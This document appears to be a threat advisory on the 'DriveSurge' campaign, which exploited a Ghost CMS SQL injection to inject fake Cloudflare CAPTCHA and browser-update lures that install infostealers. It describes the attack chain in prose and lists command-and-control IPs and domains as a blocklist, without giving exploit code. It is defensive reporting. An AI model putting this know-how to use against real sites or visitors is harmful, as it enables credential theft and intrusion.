DriveSurge Hijacks 700+ Sites to Spread LummaC2 via ClickFix

A threat actor tracked as DriveSurge exploited CVE-2026-26980 — a critical SQL injection (SQLi — a vulnerability that allows an attacker to manipulate database queries by injecting malicious SQL code) flaw in Ghost CMS (an open-source content management system popular with publishers and educational institutions) affecting versions 3.24.0 through 6.19.0 — to compromise more than 700 legitimate websites and inject malicious JavaScript that displays fake Cloudflare CAPTCHA dialogs and browser update prompts. Visitors who interact with these prompts unknowingly execute PowerShell commands that install LummaC2 (a widely-deployed commercial information stealer — malware that exfiltrates browser credentials, session cookies, and cryptocurrency wallet data) or Rhadamanthys (a competing infostealer sold on underground forums). Silent Push researchers identified DriveSurge on May 30, 2026, characterizing it as an Initial Access Broker (IAB) — a criminal service that sells victim device footholds to downstream threat actors on a Pay-Per-Install basis.

// 01 DriveSurge: Technical Details

CVE-2026-26980 is a critical SQL injection vulnerability in Ghost CMS versions 3.24.0 through 6.19.0. An unauthenticated attacker can submit a crafted HTTP request to Ghost's API that manipulates the underlying database query, extracting the Admin API Key (a credential that provides full administrative access to the Ghost installation — the ability to create, edit, and delete content, and to configure the CMS). Ghost has not published CVSS (Common Vulnerability Scoring System — a 0–10 severity scale) scores for CVE-2026-26980 at time of writing; SQL injection vulnerabilities that grant unauthenticated administrative access to web applications typically score 9.1–9.8 (Critical range) under CVSS v3.1.

DriveSurge's attack chain against CVE-2026-26980 proceeds in four steps:

• Exploitation: Send a crafted SQL injection payload to the Ghost API, extracting the Admin API Key from the site's database without authentication
• Injection: Use the extracted Admin API Key to authenticate to Ghost's Content API and inject a malicious JavaScript snippet into site posts and pages — content that every visitor to the compromised site will load
• Social engineering delivery: The injected script displays one of two deceptive browser overlays depending on the victim's user agent and session context
• Payload execution: When the victim complies with the fake dialog, their machine executes a PowerShell command (or keyboard shortcut) that downloads and runs the LummaC2 or Rhadamanthys infostealer

The two delivery techniques — ClickFix and FakeUpdate — are distinct social engineering lures:

ClickFix: Displays a fake Cloudflare "Verify you are human" CAPTCHA or browser security dialog. The dialog instructs the visitor to press Windows + R, paste a command into the Run dialog, and press Enter. The command that the page automatically copies to the clipboard is a PowerShell one-liner that downloads and executes the malware payload. ClickFix abuses user trust in Cloudflare's ubiquitous CAPTCHA — a brand virtually all web users recognize as a legitimate security check.

FakeUpdate: Displays a browser-specific update notification impersonating Chrome, Firefox, Edge, Safari, or one of ten additional browsers. The page prompts the visitor to press Ctrl+Shift+Enter to apply the update, which instead executes a clipboard-hijacked malicious command. DriveSurge maintains browser-specific templates so the fake update visually matches the visitor's actual browser.

DriveSurge routes victim installations through a sophisticated traffic distribution system (TDS — a system that routes web traffic based on visitor characteristics such as geolocation, user agent, and referrer to maximize conversion rates) called zTDS, which allows DriveSurge to sell specific victim segments to different downstream malware operators.

// 02 Exploitation Status and Threat Landscape

CVE-2026-26980 is being actively exploited in the wild as of May–June 2026. The 700+ compromised sites identified by Silent Push represent a confirmed, operational infection campaign — not a theoretical risk.

LummaC2 is a well-established commercial infostealer (malware sold as a subscription service to criminal operators) that targets browser-stored credentials and session cookies, cryptocurrency wallet files, two-factor authentication (2FA) app data, and files matching sensitive naming patterns (.key, .wallet, .env, tax documents). A successful LummaC2 infection on a developer or finance professional's machine effectively transfers all stored cloud platform credentials and financial accounts to the attacker.

Rhadamanthys is a competing infostealer with similar credential-harvesting capabilities that additionally targets VPN (Virtual Private Network) client credentials, corporate password managers, and cryptocurrency hardware wallet seeds.

DriveSurge's IAB business model means that the initial LummaC2 installation is not the final attack. Once credentials are harvested and sold, downstream purchasers may use them for ransomware deployment, business email compromise fraud, or corporate network intrusion — meaning a single visit to a compromised Ghost CMS site can be the entry point for a sophisticated enterprise breach weeks later.

Silent Push identified eight distinct infrastructure fingerprints for tracking DriveSurge, including malicious inject patterns (t.js with site parameter), SHA256-derived filename patterns, .icu TLD (Top-Level Domain) domain clusters, and specific nameserver configurations. Active C2 infrastructure confirmed at time of reporting: 147[.]45[.]42[.]205:8133 (payload server) and 46[.]226[.]166[.]57.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) for initial compromise, T1566.002 (Phishing: Spearphishing Link) for the ClickFix/FakeUpdate social engineering delivery, T1555.003 (Credentials from Password Stores: Credentials from Web Browsers) for LummaC2 credential harvesting.

// 03 Who Is Affected

Ghost CMS administrators: Any organization running Ghost CMS versions 3.24.0 through 6.19.0 is vulnerable to CVE-2026-26980. Silent Push found the 700+ compromised sites concentrated in education and technology sectors — universities, research institutions, developer documentation sites, and technology news publishers. These are high-traffic, high-trust destinations whose visitors are exactly the technically sophisticated users DriveSurge's downstream clients want to target for credential harvesting.

Site visitors: Any visitor to a compromised Ghost CMS site during the attack window who interacted with a Cloudflare CAPTCHA dialog or browser update notification may have installed LummaC2 or Rhadamanthys. Users on Windows systems are the primary target (the ClickFix PowerShell delivery is Windows-specific); macOS ClickFix variants exist but were not confirmed in this campaign.

Organizations with infected employees: Since LummaC2 targets corporate VPN credentials, SSO (Single Sign-On) session tokens, and business password managers, a single infected developer's laptop can expose an entire organization's cloud and SaaS environment.

// 04 What You Should Do Right Now

• Patch Ghost CMS immediately: Update to the latest Ghost version to receive the CVE-2026-26980 fix. Ghost publishes security updates at ghost.org/releases. If immediate patching is not possible, restrict access to the Ghost API endpoint at the network/WAF level while planning the update.

• Audit Ghost Admin API logs: Check your Ghost admin panel for unauthorized API activity — unexpected posts, page modifications, or theme changes. If malicious JavaScript was injected, it may appear as an inline <script> tag in post content or as a modified theme file.

• Scan site content for injected scripts: Use your CMS or a web application scanner to search published posts and pages for injected JavaScript, particularly code that contains references to t.js, first-node[.]rocks, cptoptious[.]com, or beacontrace[.]bond.

• Alert users if site was compromised: If you confirm your Ghost CMS site was serving malicious content, notify your audience via alternative channels (email newsletter, social media) about the dates the injection was active and advise affected visitors to scan their machines and rotate browser-stored credentials.

• Block DriveSurge IOCs at the perimeter: Add the confirmed C2 infrastructure to firewall and proxy blocklists:

“ 147.45.42.205:8133 46.226.166.57 beacontrace[.]bond cptoptious[.]com first-node[.]rocks (ext-b pattern) “

• Instruct users to reject unexpected dialogs: Remind staff and end users that legitimate Cloudflare verification pages never ask them to open a Run dialog or paste commands. A CAPTCHA that asks for keyboard shortcuts or clipboard paste is always malicious.

// 05 Background: Understanding the Risk

ClickFix as a technique has grown substantially in sophistication since it was first documented in 2024. The attack is effective because it exploits user trust in recognized brands (Cloudflare, browser vendors) and leverages the clipboard as an execution path that bypasses most browser security controls. No file is downloaded to a visible location; the victim themselves initiates the execution by pasting and pressing Enter. This means many endpoint security products that scan file downloads or monitor browser activity do not catch ClickFix delivery until the PowerShell command has already launched.

The use of a CMS vulnerability as the initial access vector — rather than compromising web server infrastructure directly — is particularly insidious. Ghost CMS has a strong reputation in the developer and education communities. Visitors approach Ghost-powered sites with high baseline trust, making them more likely to interact with prompts that appear when browsing. A site that normally publishes authoritative technical documentation or educational content becomes the delivery mechanism for malware without the site owner's knowledge.

The IAB model amplifies the downstream impact. DriveSurge does not itself deploy ransomware or conduct bank fraud. It sells access — the initial credential theft and machine control — to other criminal operators through zTDS. This means the 700+ compromised sites feed a pipeline: LummaC2 credential batches are sold to ransomware affiliates who use stolen VPN credentials for network access, or to BEC (Business Email Compromise) operators who use harvested email credentials for invoice fraud. Security teams investigating a ransomware intrusion six weeks from now may trace it back to an employee who visited a compromised educational website today.

Ghost CMS is used by thousands of publications, corporate blogs, and academic institutions globally. The SQL injection vulnerability in CVE-2026-26980 is straightforward to exploit — any script kiddie with a basic understanding of web APIs can automate the Admin API key extraction. Until Ghost sites are patched across the ecosystem, the DriveSurge campaign will continue expanding its infection pool.

// 06 Conclusion

DriveSurge is actively hijacking Ghost CMS sites via CVE-2026-26980 and turning them into ClickFix and FakeUpdate delivery platforms for LummaC2 and Rhadamanthys infostealers. Ghost CMS administrators should update immediately and audit their sites for injected JavaScript. Any Windows user who recently encountered an unexpected Cloudflare CAPTCHA asking them to press Windows + R on an educational or technology publication site should assume compromise and rotate all browser-stored credentials — DriveSurge's credential harvest feeds downstream ransomware and BEC campaigns that surface weeks after the initial infection.